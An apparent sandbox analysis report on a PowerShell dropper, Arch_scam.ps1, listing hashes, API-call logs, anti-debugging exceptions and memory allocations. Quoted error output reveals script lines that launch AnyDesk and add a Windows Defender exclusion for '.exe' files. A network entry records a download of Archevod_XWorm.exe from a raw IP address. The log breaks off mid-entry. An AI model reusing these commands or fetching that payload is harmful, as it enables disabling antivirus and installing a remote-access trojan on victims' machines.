Summary | ZeroBOX

Arch_scam.ps1

Generic Malware Antivirus AntiDebug PE File PE32 .NET EXE AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 18, 2023, 7:44 a.m. Sept. 18, 2023, 7:47 a.m.
Size 427.0B
Type ASCII text, with CRLF line terminators
MD5 671f5371312d91c2e723fe2035655aac
SHA256 f08bca5fa5192b6d3304b9322306c9018089697eeabbeb93614ba2a4156cc1dd
CRC32 167DD638
ssdeep 12:SVa3SuAHUVuAsQgns1eVM1t2U3RAFFYRnOHa:nCuAHUVuvQgsIVMMFFYRnQa
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
44.203.122.41 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Start-Process : This command cannot be executed due to the error: The system ca
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: nnot find the file specified.
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\Arch_scam.ps1:1 char:14
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + start-process <<<< "c:\users\$env:username\Music/AnyDesk.exe"
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: erationException
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ommands.StartProcessCommand
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000097
1 1 0

WriteConsoleW

buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x000000a3
1 1 0

WriteConsoleW

buffer: h was included, verify that the path is correct and try again.
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\Arch_scam.ps1:3 char:17
console_handle: 0x000000bb
1 1 0

WriteConsoleW

buffer: + Add-MpPreference <<<< -ExclusionExtension ".exe"
console_handle: 0x000000c7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x000000d3
1 1 0

WriteConsoleW

buffer: mmandNotFoundException
console_handle: 0x000000df
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x000000eb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005db5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x009c3a50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x009c3a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x009c3a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
archevod_xworm+0x198aa3 @ 0x318aa3
archevod_xworm+0x19656a @ 0x31656a
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748932
registers.edi: 4178160
registers.eax: 0
registers.ebp: 6748960
registers.edx: 0
registers.ebx: 2499697260
registers.esi: 1654784
registers.ecx: 35796920
1 0 0

__exception__

stacktrace:
archevod_xworm+0x198aa3 @ 0x318aa3
archevod_xworm+0x19656a @ 0x31656a
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748932
registers.edi: 6748932
registers.eax: 0
registers.ebp: 6748960
registers.edx: 2
registers.ebx: 2421483
registers.esi: 0
registers.ecx: 6748968
1 0 0

__exception__

stacktrace:
archevod_xworm+0x198aa3 @ 0x318aa3
archevod_xworm+0x19656a @ 0x31656a
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748932
registers.edi: 6748932
registers.eax: 0
registers.ebp: 6748960
registers.edx: 2
registers.ebx: 2421526
registers.esi: 0
registers.ecx: 6748968
1 0 0

__exception__

stacktrace:
archevod_xworm+0x198aa3 @ 0x318aa3
archevod_xworm+0x19656a @ 0x31656a
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748932
registers.edi: 6748932
registers.eax: 0
registers.ebp: 6748960
registers.edx: 2
registers.ebx: 2421526
registers.esi: 0
registers.ecx: 6748968
1 0 0

__exception__

stacktrace:
archevod_xworm+0x198aa3 @ 0x318aa3
archevod_xworm+0x19656a @ 0x31656a
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748932
registers.edi: 6748932
registers.eax: 0
registers.ebp: 6748960
registers.edx: 0
registers.ebx: 2421526
registers.esi: 0
registers.ecx: 6748968
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18fb7d @ 0x30fb7d
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748860
registers.edi: 2970096
registers.eax: 0
registers.ebp: 6748888
registers.edx: 0
registers.ebx: 4292427776
registers.esi: 1654784
registers.ecx: 1654784
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18fb7d @ 0x30fb7d
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 2
registers.ebx: 2421483
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18fb7d @ 0x30fb7d
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 2
registers.ebx: 2421526
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18fb7d @ 0x30fb7d
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 2
registers.ebx: 2421526
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18fb7d @ 0x30fb7d
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 0
registers.ebx: 2421526
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18fb7d @ 0x30fb7d
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 0
registers.ebx: 2421483
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18fe30 @ 0x30fe30
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748860
registers.edi: 2970096
registers.eax: 0
registers.ebp: 6748888
registers.edx: 0
registers.ebx: 4292427776
registers.esi: 1654784
registers.ecx: 0
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18fe30 @ 0x30fe30
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 2
registers.ebx: 2421483
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18fe60 @ 0x30fe60
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: cc 68 b8 d1 79 43 e9 9a d2 fe ff b0 d7 23 68 83
exception.symbol: archevod_xworm+0x19419b
exception.instruction: int3
exception.module: Archevod_XWorm.exe
exception.exception_code: 0x80000003
exception.offset: 1655195
exception.address: 0x31419b
registers.esp: 6748860
registers.edi: 2968141
registers.eax: 2324
registers.ebp: 6748888
registers.edx: 6748896
registers.ebx: 4292427776
registers.esi: 1656391
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: cc 68 2d e6 79 43 e9 d2 a6 fe ff 09 0f f8 80 ea
exception.symbol: archevod_xworm+0x196d63
exception.instruction: int3
exception.module: Archevod_XWorm.exe
exception.exception_code: 0x80000003
exception.offset: 1666403
exception.address: 0x316d63
registers.esp: 6748860
registers.edi: 2970096
registers.eax: 4
registers.ebp: 1111705675
registers.edx: 6748672
registers.ebx: 4292427776
registers.esi: 1654784
registers.ecx: 1246167040
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18ffc8 @ 0x30ffc8
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748860
registers.edi: 2970096
registers.eax: 0
registers.ebp: 6748888
registers.edx: 0
registers.ebx: 4292427776
registers.esi: 1654784
registers.ecx: 6748888
1 0 0

__exception__

stacktrace:
archevod_xworm+0x18ffc8 @ 0x30ffc8
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 0
registers.ebx: 2421483
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x193083 @ 0x313083
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: ed 68 24 87 79 43 e9 14 9d ff ff d5 8c 72 5c 97
exception.symbol: archevod_xworm+0x187721
exception.instruction: in eax, dx
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000096
exception.offset: 1603361
exception.address: 0x307721
registers.esp: 6748848
registers.edi: 2970096
registers.eax: 1447909480
registers.ebp: 6748876
registers.edx: 22104
registers.ebx: 0
registers.esi: 2950532
registers.ecx: 10
1 0 0

__exception__

stacktrace:
archevod_xworm+0x1930ab @ 0x3130ab
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 3f 68 65 cb 79 43 e9 79 e4 fe ff 38 59 5a c5
exception.symbol: archevod_xworm+0x192fbb
exception.address: 0x312fbb
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 1650619
registers.esp: 6748848
registers.edi: 2970096
registers.eax: 1
registers.ebp: 6748876
registers.edx: 0
registers.ebx: 0
registers.esi: 2950532
registers.ecx: 0
1 0 0

__exception__

stacktrace:
archevod_xworm+0x19018a @ 0x31018a
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748860
registers.edi: 2970096
registers.eax: 0
registers.ebp: 6748888
registers.edx: 2
registers.ebx: 4292427776
registers.esi: 1654784
registers.ecx: 0
1 0 0

__exception__

stacktrace:
archevod_xworm+0x19018a @ 0x31018a
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 2
registers.ebx: 2421526
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x1902b1 @ 0x3102b1
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748860
registers.edi: 2970096
registers.eax: 0
registers.ebp: 6748888
registers.edx: 0
registers.ebx: 4292427776
registers.esi: 1654784
registers.ecx: 1933
1 0 0

__exception__

stacktrace:
archevod_xworm+0x1902b1 @ 0x3102b1
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 0
registers.ebx: 2421483
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x1902b1 @ 0x3102b1
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 2
registers.ebx: 2421483
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x1902b1 @ 0x3102b1
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 0
registers.ebx: 2421526
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x1902b1 @ 0x3102b1
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: f7 f0 e8 3c 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf2d5
exception.instruction: div eax
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000094
exception.offset: 848597
exception.address: 0x24f2d5
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 0
registers.ebx: 2421483
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x1902b1 @ 0x3102b1
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 2
registers.ebx: 2421483
registers.esi: 0
registers.ecx: 6748896
1 0 0

__exception__

stacktrace:
archevod_xworm+0x1902b1 @ 0x3102b1
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: 0f 0b e8 11 2d 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: archevod_xworm+0xcf300
exception.instruction: ud2
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc000001d
exception.offset: 848640
exception.address: 0x24f300
registers.esp: 6748860
registers.edi: 6748860
registers.eax: 0
registers.ebp: 6748888
registers.edx: 2
registers.ebx: 2421526
registers.esi: 0
registers.ecx: 6748896
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://44.203.122.41/Archevod_XWorm.exe
request GET http://44.203.122.41/Archevod_XWorm.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 1572864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06110000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06250000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06251000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06252000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e03000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e04000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06253000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06254000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e05000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e06000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02519000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
